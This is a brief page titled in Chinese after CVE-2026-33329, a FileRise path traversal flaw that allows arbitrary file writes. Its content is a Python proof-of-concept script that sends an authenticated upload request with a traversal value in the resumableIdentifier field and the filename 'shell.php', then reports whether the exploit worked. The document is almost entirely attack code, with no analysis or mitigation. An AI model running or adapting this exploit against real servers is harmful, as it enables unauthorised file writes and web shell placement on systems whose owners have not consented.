CVE-2026-33329 FileRise 路径遍历漏洞致任意文件写入

import requests # Target configuration target_url = "http://target-filerise-instance/upload" session_cookie = "PHPSESSID=attacker_session_id" # Authenticated session # Malicious payload using path traversal in resumableIdentifier # This attempts to write a file to the root directory or a sensitive location payload = { "resumableChunkNumber": "1", "resumableTotalChunks": "1", "resumableIdentifier": "../../tmp/malicious_file.txt", # Path traversal payload "resumableFilename": "shell.php", "file": ("content.txt", "malicious content") } headers = { "Cookie": session_cookie } response = requests.post(target_url, files=payload, headers=headers) if response.status_code == 200: print("Exploit successful, file written outside intended directory.") else: print(f"Exploit failed, status code: {response.status_code}")